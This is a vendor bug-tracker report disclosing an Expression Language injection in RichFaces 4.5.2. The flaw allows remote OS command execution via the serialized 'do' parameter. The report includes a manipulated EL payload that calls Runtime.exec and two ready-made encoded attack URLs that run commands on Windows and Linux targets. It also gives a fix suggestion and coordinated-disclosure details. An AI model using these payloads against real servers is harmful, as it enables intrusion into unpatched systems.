Uploaded image for project: 'RichFaces'
  1. RichFaces
  2. RF-13977

Remote Command Injection (EL Injection)

    Details

    • Type: Bug
    • Status: Resolved (View Workflow)
    • Priority: Critical
    • Resolution: Done
    • Affects Version/s: 4.5.2
    • Fix Version/s: 4.5.4
    • Component/s: component-a4j-core
    • Labels:
      None
    • Environment:

      My test environment:
      Windows7
      Tomcat 7.0.47
      Java 1.7.0_25

    • Security Sensitive Issue:
      This issue is security relevant

      Description

      Remote attackers can inject EL (Expression Language) via "do" parameter.
      This leads to remote Java method execution vulnerability.

      I used showcase application (v4.5.2, a4j:mediaOutput) to confirm the bug.

      Normal URL path: /richfaces-showcase/rfRes/org.richfaces.resource.MediaOutputResource.jsf?do=eAFtUz1oFEEUflk50CRC1PiHBM4IQcHMEgNBOAMSfw8upjh!Y-Pc7nNvj9mdycxcbjEqNjYiKNgGLGy1shLS2AqxCFqlshILReyMjW!2Yn4Wp9jdGd73vW--9-3r71Bqa9h3u9bi85wJnkZsptHCwFaef7z5csCcEB5ApgCgZDTs2ayaklIgT5fL-tHnxbUfHvTMQmmeizZStYXeOOER-i2FEeFGHC5jd3mAhgUyUTLF1LK65RYvSxGirvN51Lc-vJ18sbg87YFXg12B4MZc4Qla2JvL8508v251nEaVGvQawoQ5h4UD3YpY-nXUMRfxPd4QWMmUovbHpY6YjoNmV0CIiWQJhjGfaVvVtmzafZ!nltM13erxYEcV-gIppK6mIWZj23antu3Gc3dyGD08MwcPoeS6jtJFmWmn69d2vQVaw1CwqzyaRtuU4YVMaTQmlqkjoNXTT3ZrONw1jEqLdXO1g32zz778dGOhwW3UbTK9evyk!mt25Uw-OGe-u32rIY1hHRSh63-D3kXixtD7T2sj!WWaZA12hqQ1oulYOJI7m!ko!CKkQgrGCuxtGwvX4qLUHa5DGlURtfpu!5!lp0tLTp8zazdpHHYsXPGgiQ5chFQTJaq!-aoYu3!UGZTDOodg8NhCPscpSiJTWlK8zAOAYqLXI!Nm5frXb0MLl!4l2rMwmAc6lqybBCpEnlgYyI-3!A1KZZ0G3PE3QuRvyY9vOOlD48dJdM1Q7Ee7Byxr2kSUz45PnJw4XQ6I2uI5mVqK!uTw!5QPZ-ovlY47BQ__

      The "do" parameter's value is encoded serialized object data.
      The decoded data is shown below.

      %AC%ED%00%05ur%00%13[Ljava.lang.Object;%90%CEX%9F%10s)l%02%00%00xp%00%00%00%05sr%00%11java.lang.Boolean%CD%20r%80%D5%9C%FA%EE%02%00%01Z%00%05valuexp%00t%00%0Aimage/jpegsr%00&javax.faces.component.StateHolderSaverY%CA%B3=%93%9C%CDM%02%00%02L%00%09classNamet%00%12Ljava/lang/String;L%00%0AsavedStatet%00%16Ljava/io/Serializable;xppsr%00(org.richfaces.demo.mediaOutput.MediaData%00%00%00%00%00%00%00%01%02%00%03I%00%0BcolorIndex1I%00%0BcolorIndex2I%00%0BcolorIndex3xp%00%00%00%00%00%00%00%01%00%00%00%02sq%00~%00%05psr%00-com.sun.faces.facelets.el.TagMethodExpression%00%00%00%00%00%00%00%01%0C%00%00xr%00%19javax.el.MethodExpressionqL%17%0BZ%8F%E1%F0%02%00%00xr%00%13javax.el.Expression%A3%85%8AS%F2Z%D2<%02%00%00xpsr%00&org.jboss.weld.el.WeldMethodExpressionb%1D%C1%D4%FA&%0C%20%02%00%01L%00%08delegatet%00%1BLjavax/el/MethodExpression;xr%001org.jboss.weld.util.el.ForwardingMethodExpression%DB%B9%15%FB%CD%8C%BC%BC%02%00%00xq%00~%00%0Dsr%00"org.apache.el.MethodExpressionImplI%F9a%DBl1|!%0C%00%00xq%00~%00%0Dw%18%00%14#{mediaBean.process}%00%00ur%00%13[Ljava.lang.String;%AD%D2V%E7%E9%1D{G%02%00%00xp%00%00%00%02t%00%14java.io.OutputStreamt%00%10java.lang.Objectppxwb%00`/richfaces/mediaOutput/samples/imgUsage-sample.xhtml%20@36,68%20createContent="#{mediaBean.process}"xp
      (unprintable chars are percent-encoded)

      As you can see, the data contains EL, which will be parsed and executed by RichFaces on the server.

      Obviously you can manipulate the EL in the data, as there is not integrity check by default.

      Normal: %18%00%14#{mediaBean.process}%00%00
      Manipulated: %88%00%84#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("ping -n 2 8.8.8.8")}%00%00

      With the manipulated value above, you can execute OS command (ping command) on the target server.

      For your convenience, I provide two attack URL examples:

      1. Exec "ping -n 2 8.8.8.8" on the target (for Windows)
      /richfaces-showcase/rfRes/org.richfaces.resource.MediaOutputResource.jsf?do=eJxtU01o1EAUfo0saFuhWn8QKawplF2wE9pCKawFaf1b2Fpw!a0XZ5NnNuskk85MdoO14kFBRFDwWvDgVU-ehF68CvVQ9NSTJ!GgiDfrxUnSdm0wIcnMy!e-9943773-DoVIwODNWou2KWE0cMl8o4W2qjz!eP3lgCwzAyAOAaAgBRzoomY4Z0iDtaJ48Hll84cBPQtQaFMWoUYr6PV86qLVCtHVfiOJX0xuUxslsbkf8gADReqKKrzAmYOiTtsobnx4O!1iZW3OAKMG-2xGpbxIfVRwME3PSgJbdSW8wK3UoFdqHyflUHAkQ3jcqqPwKPPu0gbDShyGOnyJC5cIz25mCTjoc-Kj49H5SIWRInPJ-gxVFLKrx4A9VeizOeOiGjgYj-3aje!aTaTqpG76MeQi3IdCEnVUF0pkFGyVnbwZKkmQkcvUnUPV5M7ZOBQopceDbY5-LbeAY5lgGprHLdaO9i08-!LTSHGDO7gu4tWjJ!VfC-un0oNLxE-qbzW4lKSDzEnA1!Q3T9wYev9pc6S!qE-yBnsdnaubKns8VTa2kFl5l4rOYCzHHimPJSHOcdGhwtFHlffaeHf4z9rT1dUkv0Ss!TpHM2GhIbWb-L-iq37Iqr!pBhu7d6J!263zGB4OLwlcjFAq4qKaTRqmVN5Z1jjVnaUNTC-yn2a3gS9FgfJ8NFN8FrBk6mXX7gVtfgdLQcRYmWCMdskMdT3F0aA4Xpwi6W2WlwHyE7TVom!Wr379NrR0fnuCDAWHUpDHSdZ5GojUVzCQn74wjDsNuGXtNK31T79akmo9tM3z3StSj9loZiBxU!mseHpi8uTkVNHW1ApneaD0qE2bw0spw4yeWRIKrinlshmHfwEV2GDk

      2. Exec "touch /tmp/foobar" on the target (for Linux)
      /richfaces-showcase/rfRes/org.richfaces.resource.MediaOutputResource.jsf?do=eJxtU01o1FAQnkYWtK1QrT-IFNYUyi7YF2qhCGtBWv8WthZcf9uLb5NpNutLXvrey26wVjwoiAgKXgsevOrJk9CLV6Eeip568iQeFPFmvfiStF0bDCSZTL75ZuZ7M6-!QyESMDhfa9E2JYwGLplttNBWlecfb74ckGVmAMQhABSkgANd1BTnDGmwVhQPPq9s!jCgZw4Kbcoi1GgFvZ5PXbRaIbo6biSJi8kCtVESm!shDzBQpK6owkucOSjqtI3i1oe3ky9W1mYMMGqwz2ZUysvURwUH0!KsJLFVV8IL3EoNeqWOcVIOBUcyhMetOgqPMu8ubTCsxGGo05e4cInw7GZWgIM-Jz46Hp2NVBgpMpPY56iikF09BuypQp!NGRfVwMF4bNfXqV1f46k6aZi-DbkI96GQZB3VjRIZBVttJ0-GShJk5Cp1Z1A1uXM-DgVK6fFgm6Nfyy3gWCaYhuZxi7WjfXPPvvw0UtzgDq6LePXoSf3X3PqZ9OAS8ZPuWw0uJekgcxLwDf3OEzeG3n!aHOkv6pOswV5H1-qmyh5PlY0tZFY-pKIrGMuxR8pjSYoLXHSocPRR5aM23h3-s!Z0dTWpLxFrv67RTFhoSO0m!q!pqh-y6m-6wcbunejfDus8hofDSwIXI5SKuKimk4EplXfMGqd6srSDaSP7aXYH-EoUKM9HM8VnCUumNrt-L2jzO1gKIsbKBGO0S6bikd0sWsoPrQXOG1SY5WWA!AZtjeib9etfvw0tXdzeIEPBoRTkcZJNngYi9RUM5LcvDONOA25bO0Nr!TOvlqRaD-3zfPea1Gs2mjlI3FQ-K54dnzg5cbpoa2qF0zxQetUmzeGllGFK7ywJBdeUctmMw7-!tGMK

      I guess this bug affects not only showcase app but also any app using RichFaces, I haven't tested on apps other than showcase though. To make it work on non-showcase apps, probably you need to replace "org.richfaces.demo.mediaOutput.MediaData" instance in the serialized data with an instance of other classes or NULL, because this (MediaData) class is specific to showcase app.

      Fix suggestion: If you don't need to execute ELs supplied by clients, just ignore incoming ELs. If you need them to execute, signature check may be needed to protect the data from manipulation. Note that the encryption mechanism (DES/ECB) in "org.ajax4jsf.util.base64.Codec" is, in general I think, considered insufficient to ensure data integrity.

      Note: I will report this issue to IPA (http://www.ipa.go.jp/index-e.html) which works with JPCERT/CC (Japanese CSIRT). Thus these organizations may contact you regarding this bug in a few months or so. They basically work to promote proper and responsible handling of vulnerability information.

      Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

        Gliffy Diagrams

          Attachments

            Activity

              People

              • Assignee:
                michpetrov Michal Petrov
                Reporter:
                terada.takeshi Takeshi Terada
                Involved:
                Matej Novotny
              • Votes:
                0 Vote for this issue
                Watchers:
                4 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: